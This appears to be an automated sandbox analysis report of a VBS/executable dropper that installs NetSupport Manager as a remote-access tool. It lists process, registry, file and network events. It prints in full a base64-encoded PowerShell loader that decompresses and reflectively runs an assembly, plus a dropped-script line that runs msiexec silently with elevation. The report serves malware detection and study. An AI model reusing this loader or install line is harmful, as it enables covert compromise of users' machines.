                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B45E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, checkdvd.exe, 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, MSI1387.tmp, 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 0000001E.00000000.114225758017.00007FF679395000.00000008.00000001.01000000.00000010.sdmp, MSI23E6.tmp, 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, pcicfgui_client.exe, 00000022.00000002.114291271774.000000006B487000.00000004.00000001.01000000.00000022.sdmpString found in binary or memory: https://www.netsupportschool.com/ios-android/111
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: unknownHTTPS traffic detected: 176.126.113.166:443 -> 192.168.11.20:49742 version: TLS 1.2
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C6A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,25_2_005C6A30
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C6A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,25_2_005C6A30
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00906A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,27_2_00906A30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00773FC0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,28_2_00773FC0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD6A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,29_2_00FD6A30
                                Source: client32.exe, 00000021.00000002.115186530049.000000006C61A000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_fef3c21d-6
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection,25_2_005DF030
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DF225 GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,25_2_005DF225
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection,27_2_0091F030
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091F225 GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,27_2_0091F225
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection,29_2_00FEF030
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEF225 GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,29_2_00FEF225

                                E-Banking Fraud

                                barindex
                                Malicious encrypted Powershell command line found
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Reads the Security eventlog
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Reads the System eventlog
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

                                System Summary

                                barindex
                                Potential malicious VBS script found (suspicious strings)
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: shell.ShellExecute "msiexec.exe", "/i """ & targetFile & """ /quiet", "", "runas", 1Jump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,25_2_005D80C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,25_2_005D4420
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DD040 ExitWindowsEx,25_2_005DD040
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00914420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,27_2_00914420
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091D040 ExitWindowsEx,27_2_0091D040
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,29_2_00FE4420
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FED040 ExitWindowsEx,29_2_00FED040
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\e6def7.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE5EC.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE66A.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6B9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE708.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE748.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE787.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{CBB68368-7767-4CFF-B3E5-211488346702}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE94E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE98D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9CD.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9FC.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA2C.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA5C.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA9C.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEACC.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAFB.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB3B.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB6B.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBAA.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBEA.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC1A.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC59.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC89.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECC9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED08.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED48.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED87.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDC7.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE06.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE46.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE85.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEEB5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEF23.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF0BB.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF10A.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF149.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF179.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1A9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1F8.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF238.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF2D5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF314.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF373.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF691.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF6C1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF710.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF869.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF8D7.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF917.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF985.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA3.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1387.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DBA.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\e6defa.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\e6defa.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23E6.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2955.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3741.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3771.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI37C0.tmpJump to behavior
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\pcimsg.dll
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\drivers\Msft_Kernel_nskbfltr_01005.Wdf
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr2.sys
